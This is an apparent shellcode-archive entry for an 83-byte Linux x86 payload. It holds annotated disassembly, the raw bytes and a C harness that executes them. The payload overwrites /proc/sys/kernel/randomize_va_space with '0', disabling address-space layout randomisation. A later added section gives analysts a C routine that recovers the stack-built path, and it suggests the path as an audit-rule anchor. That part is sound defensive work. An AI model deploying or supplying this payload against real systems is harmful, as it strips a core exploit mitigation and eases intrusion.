# Title : Linux x86 ASLR deactivation - 83 bytes
# Published : 2012-08-02
# Author : Jean Pascal Pereira
/*
Title: Linux x86 ASLR deactivation - 83 bytes
Author: Jean Pascal Pereira <pereira@secbiz.de>
Web: http://0xffe4.org

Disassembly of section .text:

08048060 <_start>:
 8048060:  31 c0            xor    %eax,%eax
 8048062:  50               push   %eax            ; NUL terminator for the path
 8048063:  68 70 61 63 65   push   $0x65636170     ; "pace"
 8048068:  68 76 61 5f 73   push   $0x735f6176     ; "va_s"
 804806d:  68 69 7a 65 5f   push   $0x5f657a69     ; "ize_"
 8048072:  68 6e 64 6f 6d   push   $0x6d6f646e     ; "ndom"
 8048077:  68 6c 2f 72 61   push   $0x61722f6c     ; "l/ra"
 804807c:  68 65 72 6e 65   push   $0x656e7265     ; "erne"
 8048081:  68 79 73 2f 6b   push   $0x6b2f7379     ; "ys/k"
 8048086:  68 6f 63 2f 73   push   $0x732f636f     ; "oc/s"
 804808b:  68 2f 2f 70 72   push   $0x72702f2f     ; "//pr"
 8048090:  89 e3            mov    %esp,%ebx       ; ebx -> "//proc/sys/kernel/randomize_va_space"
 8048092:  66 b9 bc 02      mov    $0x2bc,%cx      ; mode argument
 8048096:  b0 08            mov    $0x8,%al        ; syscall 8 = creat
 8048098:  cd 80            int    $0x80
 804809a:  89 c3            mov    %eax,%ebx       ; ebx = returned fd
 804809c:  50               push   %eax
 804809d:  66 ba 30 3a      mov    $0x3a30,%dx     ; bytes "0:"
 80480a1:  66 52            push   %dx
 80480a3:  89 e1            mov    %esp,%ecx       ; ecx -> "0"
 80480a5:  31 d2            xor    %edx,%edx
 80480a7:  42               inc    %edx            ; length = 1
 80480a8:  b0 04            mov    $0x4,%al        ; syscall 4 = write
 80480aa:  cd 80            int    $0x80
 80480ac:  b0 06            mov    $0x6,%al        ; syscall 6 = close
 80480ae:  cd 80            int    $0x80
 80480b0:  40               inc    %eax            ; close returned 0, so eax = 1 = exit
 80480b1:  cd 80            int    $0x80

*/
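#include <stdio.h>
#include <string.h>

/* Raw bytes of the _start routine disassembled above (83 bytes, no NULs). */
char shellcode[] = "\x31\xc0\x50\x68\x70\x61\x63\x65\x68\x76\x61\x5f\x73\x68"
                   "\x69\x7a\x65\x5f\x68\x6e\x64\x6f\x6d\x68\x6c\x2f\x72\x61"
                   "\x68\x65\x72\x6e\x65\x68\x79\x73\x2f\x6b\x68\x6f\x63\x2f"
                   "\x73\x68\x2f\x2f\x70\x72\x89\xe3\x66\xb9\xbc\x02\xb0\x08"
                   "\xcd\x80\x89\xc3\x50\x66\xba\x30\x3a\x66\x52\x89\xe1\x31"
                   "\xd2\x42\xb0\x04\xcd\x80\xb0\x06\xcd\x80\x40\xcd\x80";

int main(void)
{
    /* Print the payload length, then call the byte array as a function. */
    fprintf(stdout, "Length: %zu\n", strlen(shellcode));
    (*(void (*)()) shellcode)();
    return 0;
}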
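
For analysts triaging a sample like the one above: the target path never appears as a contiguous string, because it is built on the stack from nine `push imm32` instructions in reverse 4-byte chunks. The following is an added example, not part of the original submission; `recover_stack_string` and the `sample` array (bytes copied from the listing) are names chosen here. It locates the longest run of consecutive `68 imm32` instructions and rebuilds the string they leave in memory, using a simple linear scan that assumes the run starts on an instruction boundary.

```c
#include <stdio.h>
#include <string.h>

/* Bytes copied from the listing above: the push run and its neighbours. */
static const unsigned char sample[] = {
    0x31,0xc0,0x50,
    0x68,0x70,0x61,0x63,0x65, 0x68,0x76,0x61,0x5f,0x73,
    0x68,0x69,0x7a,0x65,0x5f, 0x68,0x6e,0x64,0x6f,0x6d,
    0x68,0x6c,0x2f,0x72,0x61, 0x68,0x65,0x72,0x6e,0x65,
    0x68,0x79,0x73,0x2f,0x6b, 0x68,0x6f,0x63,0x2f,0x73,
    0x68,0x2f,0x2f,0x70,0x72, 0x89,0xe3
};

/* Find the longest run of consecutive "push imm32" (opcode 0x68) instructions
 * and rebuild the string they leave on the stack. The last push lands at the
 * lowest address, so the 4-byte chunks are emitted in reverse push order.
 * Returns the string length, or 0 if there is no run or out is too small. */
size_t recover_stack_string(const unsigned char *buf, size_t len,
                            char *out, size_t outsz)
{
    size_t best_start = 0, best_n = 0;
    for (size_t i = 0; i < len; ) {
        size_t n = 0;
        while (i + 5 * (n + 1) <= len && buf[i + 5 * n] == 0x68)
            n++;                          /* each push imm32 is 5 bytes */
        if (n > best_n) { best_n = n; best_start = i; }
        i += n ? 5 * n : 1;
    }
    if (best_n == 0 || 4 * best_n + 1 > outsz)
        return 0;
    for (size_t k = 0; k < best_n; k++)   /* walk the pushes last-to-first */
        memcpy(out + 4 * k, buf + best_start + 5 * (best_n - 1 - k) + 1, 4);
    out[4 * best_n] = '\0';
    return 4 * best_n;
}

int main(void)
{
    char path[128];
    size_t n = recover_stack_string(sample, sizeof sample, path, sizeof path);
    printf("%zu bytes: %s\n", n, path);
    return 0;
}
```

The recovered path is a useful detection anchor: an unexpected write to that sysctl file is what a host-based audit rule would watch for.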